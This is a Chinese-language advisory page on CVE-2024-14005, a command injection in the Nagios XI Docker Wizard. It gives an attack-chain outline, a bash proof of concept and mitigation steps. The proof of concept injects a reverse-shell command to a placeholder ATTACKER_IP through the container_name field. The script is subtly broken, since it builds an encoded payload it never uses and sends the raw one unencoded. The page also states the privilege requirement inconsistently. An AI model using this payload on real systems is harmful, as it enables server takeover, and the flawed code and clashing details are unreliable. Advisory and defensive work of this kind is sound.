CVE-2024-14005 Nagios XI Docker向导命令注入漏洞

漏洞信息

漏洞编号

CVE-2024-14005

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nagios XI

漏洞概述

CVE-2024-14005是Nagios XI软件中的一个高危命令注入漏洞，CVSS评分达到8.8分。该漏洞存在于Nagios XI的Docker Wizard组件中，由于对用户输入的验证不足，攻击者可以通过在Docker向导中注入Shell元字符来执行任意命令。漏洞影响Nagios XI 2024R1.2之前的所有版本。攻击者需要拥有管理员权限即可利用此漏洞，成功利用后可获得与Nagios XI Web应用用户相同的权限，从而在服务器上执行任意系统命令。该漏洞由VulnCheck的安全研究人员发现并报告，披露日期为2024年10月30日。由于Nagios XI是企业级监控解决方案，广泛应用于各类组织的IT基础设施中，此漏洞对企业网络安全构成严重威胁。建议受影响的用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于Nagios XI的Docker Wizard组件对用户提供的输入参数缺乏充分的输入验证和清理。攻击者作为已认证的管理员用户登录Nagios XI系统后，可以访问Docker Wizard功能模块。在配置Docker容器参数时，攻击者可以在特定输入字段中注入恶意的Shell元字符（如分号、管道符、反引号等）。这些未经过滤的输入会被直接拼接到后端的系统命令调用中，导致命令注入。当Web应用执行这些包含恶意payload的命令时，攻击者注入的任意系统命令将以Web服务进程的权限（通常是nagios用户）被执行。由于Web应用通常以较高权限运行，攻击者可能通过计划任务或SUID程序进一步提升权限。攻击者可以利用此漏洞执行系统命令、读取敏感文件、建立持久化后门或横向移动到其他系统。漏洞的利用过程相对简单，不需要复杂的攻击准备，但对目标系统的影响极其严重。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标网络，识别运行Nagios XI且版本低于2024R1.2的服务器

STEP 2

步骤2

初始访问：攻击者通过合法渠道获取Nagios XI管理员账户凭据，或利用其他漏洞获取低权限账号后提权至管理员

STEP 3

步骤3

访问Docker Wizard：攻击者登录Nagios XI管理界面，导航至Docker Wizard配置页面

STEP 4

步骤4

构造恶意payload：攻击者在Docker容器名称或相关输入字段中注入Shell命令，如添加分号后跟任意系统命令

STEP 5

步骤5

触发命令注入：提交表单后，未经过滤的用户输入被拼接到后端系统命令中执行

STEP 6

步骤6

建立持久化：攻击者可以在目标系统上建立后门、添加用户账户或修改计划任务以维持访问

STEP 7

步骤7

横向移动：利用获得的服务器访问权限，进一步攻击内网中的其他系统或数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-14005 Nagios XI Docker Wizard Command Injection PoC
# Author: Security Researcher
# Target: Nagios XI < 2024R1.2
# Note: Requires authenticated administrator access

TARGET="http://target-nagios-xi.local"
USERNAME="admin"
PASSWORD="admin_password"
COOKIE_JAR="/tmp/nagios_cookies.txt"
CSRF_TOKEN=""

# Step 1: Login to Nagios XI
echo "[*] Logging in to Nagios XI..."
LOGIN_RESP=$(curl -s -c $COOKIE_JAR -b $COOKIE_JAR \
    -X POST "$TARGET/nagiosxi/login.php" \
    -d "username=$USERNAME&password=$PASSWORD&submit=Login" \
    -L)

# Extract CSRF token if needed
echo "[*] Login completed"

# Step 2: Navigate to Docker Wizard
echo "[*] Accessing Docker Wizard..."
curl -s -b $COOKIE_JAR \
    "$TARGET/nagiosxi/config/wizard/docker-wizard.php" > /dev/null

# Step 3: Inject malicious command via wizard parameter
# The payload injects a reverse shell command
PAYLOAD=';bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1;'
ENCODED_PAYLOAD=$(echo -n "$PAYLOAD" | jq -Rs .)

echo "[*] Sending command injection payload..."
curl -s -b $COOKIE_JAR \
    -X POST "$TARGET/nagiosxi/includes/components/docker_wizard/process_wizard.php" \
    -d "step=3&container_name=test$PAYLOAD&image=alpine"

echo "[+] Payload sent. Check your listener for reverse shell."

影响范围

Nagios XI < 2024R1.2

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 禁用或限制Docker Wizard功能组件；2) 审查并限制具有管理权限的账户；3) 在Web应用层实施输入过滤和验证机制；4) 配置网络分段，限制从Nagios XI服务器到其他关键系统的访问；5) 启用详细的审计日志，监控异常的管理员操作；6) 考虑使用Web应用防火墙规则阻断已知的命令注入特征。建议尽快执行正式升级，因为临时缓解措施可能无法完全消除漏洞风险。